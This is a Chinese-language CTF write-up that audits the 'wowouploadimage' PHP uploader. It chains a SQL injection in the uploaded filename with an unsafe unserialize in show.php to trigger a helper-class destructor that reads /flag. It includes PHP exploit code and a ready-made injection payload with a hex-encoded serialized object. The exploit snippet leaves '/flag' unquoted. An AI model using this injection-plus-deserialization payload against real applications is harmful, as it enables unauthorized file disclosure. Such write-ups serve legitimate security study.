pop链5之sql注入的反序列化利用

pop链5之sql注入的反序列化利用

我们打开页面后,发现一个关键点

1
Powered By wowouploadimage

我们可以在github里下载源码,,发现有几个php文件,分别是

1
2
3
helper.php
show.php
upload.php

通过对源码的大概审计,发现helper.php是主要的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
<?php
class helper {
	protected $folder = "pic/";
	protected $ifview = False; 
	protected $config = "config.txt";
	// The function is not yet perfect, it is not open yet.

	public function upload($input="file")
	{
		$fileinfo = $this->getfile($input);
		$array = array();
		$array["title"] = $fileinfo['title'];
		$array["filename"] = $fileinfo['filename'];
		$array["ext"] = $fileinfo['ext'];
		$array["path"] = $fileinfo['path'];
		$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
		$array["attr"] = serialize($my_ext);
		$id = $this->save($array);
		if ($id == 0){
			die("Something wrong!");
		}
		echo "<br>";
		echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";
	}

	public function getfile($input)
	{
		if(isset($input)){
			$rs = $this->check($_FILES[$input]);
		}
		return $rs;
	}

	public function check($info)
	{
		$basename = substr(md5(time().uniqid()),9,16);
		$filename = $info["name"];
		$ext = substr(strrchr($filename, '.'), 1);
		$cate_exts = array("jpg","gif","png","jpeg");
		if(!in_array($ext,$cate_exts)){
			die("<p>Please upload the correct image file!!!</p>");
		}
	    $title = str_replace(".".$ext,'',$filename);
	    return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
	}

	public function save($data)
	{
		if(!$data || !is_array($data)){
			die("Something wrong!");
		}
		$id = $this->insert_array($data);
		return $id;
	}

	public function insert_array($data)
	{	
		$con = mysqli_connect("127.0.0.1","root","root","pic_base");
		if (mysqli_connect_errno($con)) 
		{ 
		    die("Connect MySQL Fail:".mysqli_connect_error());
		}
		$sql_fields = array();
		$sql_val = array();
		foreach($data as $key=>$value){
			$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
			$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
			$sql_fields[] = "`".$key_temp."`";
			$sql_val[] = "'".$value_temp."'";
		}
		$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
		mysqli_query($con, $sql);
		$id = mysqli_insert_id($con);
		mysqli_close($con);
		return $id;
	}

	public function view_files($path){
		if ($this->ifview == False){
			return False;
			//The function is not yet perfect, it is not open yet.
		}
		$content = file_get_contents($path);
		echo $content;
	}

	function __destruct(){
		# Read some config html
		$this->view_files($this->config);
	}
}

?>

我们查看上传文件的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
public function upload($input="file")
{
	$fileinfo = $this->getfile($input);
	$array = array();
	$array["title"] = $fileinfo['title'];
	$array["filename"] = $fileinfo['filename'];
	$array["ext"] = $fileinfo['ext'];
	$array["path"] = $fileinfo['path'];
	$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
	$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
	$array["attr"] = serialize($my_ext);
	$id = $this->save($array);
	if ($id == 0){
		die("Something wrong!");
	}
	echo "<br>";
	echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";
}

我们可以发现一个序列化的点

1
$array["attr"] = serialize($my_ext);

而且,通过审计helper.php源码,还发现了一个危险的函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
	public function view_files($path){
		if ($this->ifview == False){
			return False;
			//The function is not yet perfect, it is not open yet.
		}
		$content = file_get_contents($path);
		echo $content;
	}

	function __destruct(){
		# Read some config html
		$this->view_files($this->config);
	}
}

通过对上面代码的审计,发现只要我们在销毁对象时,即可使用file_get_contents()函数,来读取信息,所以我们可以构造exp

1
2
3
4
5
6
7
8
9
<?php

class helper{
	protected $ifview=true;
	protected $config=/flag;
}
$a=new helper();
echo bin2hex(serialize($a));
?>

然后我们寻找反序列化的点,发现在show.php文件中有一个反序列化的点

1
$attr = unserialize($attr_temp);

然后我们在helper.php文件中,从getfile()函数可以指到check()函数

1
2
3
4
5
6
7
8
9
10
11
12
13
public function check($info)
{
	$basename = substr(md5(time().uniqid()),9,16);
	$filename = $info["name"];
	$ext = substr(strrchr($filename, '.'), 1);
	$cate_exts = array("jpg","gif","png","jpeg");
	if(!in_array($ext,$cate_exts)){
		die("<p>Please upload the correct image file!!!</p>");
	}
    $title = str_replace(".".$ext,'',$filename);
    return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
}

知道上传文件中各变量的含义

1
2
3
4
5
$array["title"]:去掉后缀的文件名
$array["filename"]:substr(md5(time().uniqid()),9,16)加上后缀
$array["ext"]:上传文件名后缀
$array["path"]:路径信息
$array["attr"]:反序列化后的图片长宽信息

然后再看回show.php文件的Get_All_Images()函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
public function Get_All_Images(){
	$sql = "SELECT * FROM images";
	$result = mysqli_query($this->con, $sql);
	if ($result->num_rows > 0){
	    while($row = $result->fetch_assoc()){
	    	if($row["attr"]){
	    		$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
				$attr = unserialize($attr_temp);
			}
	        echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";
	    }
	}else{
	    echo "<p>You have not uploaded an image yet.</p>";
	}
	mysqli_close($this->con);
}

可知会将上传文件的长宽的序列化信息进行反序列化,这是我们可以利用的点,来输入我们构造的序列化信息,进行变量覆盖,从而利用file_get_contents()读取flag信息,而这里是提取数据库中的信息,所以我们需要找一个sql注入的点,而我们可以看helper.php文件中的save()函数,然后save()函数指向insert_array()函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
public function insert_array($data)
{	
	$con = mysqli_connect("127.0.0.1","root","root","pic_base");
	if (mysqli_connect_errno($con)) 
	{ 
	    die("Connect MySQL Fail:".mysqli_connect_error());
	}
	$sql_fields = array();
	$sql_val = array();
	foreach($data as $key=>$value){
		$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
		$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
		$sql_fields[] = "`".$key_temp."`";
		$sql_val[] = "'".$value_temp."'";
	}
	$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
	mysqli_query($con, $sql);
	$id = mysqli_insert_id($con);
	mysqli_close($con);
	return $id;
}

可见它会将上传文件的那些变量信息写入数据库中,然后我们访问show.php文件,触发反序列化,从而将我们构造在图片长宽的序列化数据进行反序列化,从而使用file_get_contents()函数来读取flag,从check()函数中,我们发现只可以从title变量下手,所以我们可以先上传一个文件,然后文件名为我们构造的传入数据库的信息,即

1
filename="a','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#"

再访问一下show.php就可以看见flag了